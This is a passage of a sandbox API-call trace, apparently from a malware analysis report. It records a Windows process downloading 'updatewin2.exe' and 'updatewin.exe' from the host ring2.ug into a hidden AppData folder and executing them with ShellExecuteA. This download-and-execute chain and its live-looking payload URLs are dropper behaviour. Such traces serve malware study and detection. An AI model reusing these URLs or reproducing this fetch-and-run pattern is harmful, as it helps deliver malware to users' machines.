hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.530] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.531] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.531] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.531] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.532] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.532] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.533] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.533] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.556] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.557] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.557] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.558] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.559] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.560] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0073.560] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0073.561] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0xa00) returned 1 [0073.561] WriteFile (in: hFile=0x5e0, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0xa00, lpOverlapped=0x0) returned 1 [0073.562] CloseHandle (hObject=0x5e0) returned 1 [0073.565] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0073.571] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0073.572] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin1.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0075.821] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x7596c0 | out: hHeap=0x680000) returned 1 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x319e258 | out: hHeap=0x680000) returned 1 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f3b8 | out: hHeap=0x680000) returned 1 [0075.822] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175f78 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0075.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3175f78, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1072 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin2.exe") returned 45 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x316f0d0 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175f78 | out: hHeap=0x680000) returned 1 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0075.822] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin2.exe", cchWideChar=-1, lpMultiByteStr=0x99c9c68, cbMultiByte=2096, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin2.exe", lpUsedDefaultChar=0x0) returned 45 [0075.822] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0075.822] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0075.822] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://ring2.ug/files/penelop/updatewin2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0076.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0076.022] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x998d6d0, lpdwBufferLength=0x998d710, lpdwIndex=0x0 | out: lpBuffer=0x998d6d0*, lpdwBufferLength=0x998d710*=0x4, lpdwIndex=0x0) returned 1 [0076.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d36a0 [0076.022] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eec30 [0076.022] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d36a0 | out: hHeap=0x680000) returned 1 [0076.022] lstrcpyA (in: lpString1=0x3189d68, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8" [0076.023] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8", pMore="updatewin2.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe") returned 1 [0076.023] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x759860 [0076.023] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6bc [0076.023] SetFilePointer (in: hFile=0x6bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.023] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.168] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.170] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.170] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.296] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.296] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.297] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.297] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.298] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.298] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.420] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.420] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.421] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.423] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.423] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.424] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.424] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.424] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.425] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.425] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.425] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.426] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.426] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.458] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.458] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.468] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.468] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.469] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.470] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.470] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.470] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.471] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.471] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.472] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.499] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.500] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.513] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.513] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.514] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.515] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.515] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.515] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.516] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.516] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.517] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.543] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.545] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.555] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.556] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x2800) returned 1 [0076.556] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x2800, lpOverlapped=0x0) returned 1 [0076.557] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x998d778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x998d6d8 | out: lpBuffer=0x998d778*, lpdwNumberOfBytesRead=0x998d6d8*=0x1200) returned 1 [0076.561] WriteFile (in: hFile=0x6bc, lpBuffer=0x998d778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x998d6dc, lpOverlapped=0x0 | out: lpBuffer=0x998d778*, lpNumberOfBytesWritten=0x998d6dc*=0x1200, lpOverlapped=0x0) returned 1 [0076.561] CloseHandle (hObject=0x6bc) returned 1 [0076.565] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0076.571] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0076.571] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\57db73de-989a-4393-870b-10752e4771b8\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0076.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x759860 | out: hHeap=0x680000) returned 1 [0076.635] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eec30 | out: hHeap=0x680000) returned 1 [0076.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316f0d0 | out: hHeap=0x680000) returned 1 [0076.636] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3a70 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x85e) returned 0x31cf750 [0076.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x31c3a70, cbMultiByte=-1, lpWideCharStr=0x31cf750, cchWideChar=1071 | out: lpWideCharStr="http://ring2.ug/files/penelop/updatewin.exe") returned 44 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x316f0d0 [0076.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0076.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3a70 | out: hHeap=0x680000) returned 1 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82f) returned 0x99ca4f0 [0076.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://ring2.ug/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x99ca4f0, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://ring2.ug/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0076.636] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0076.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0076.636] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 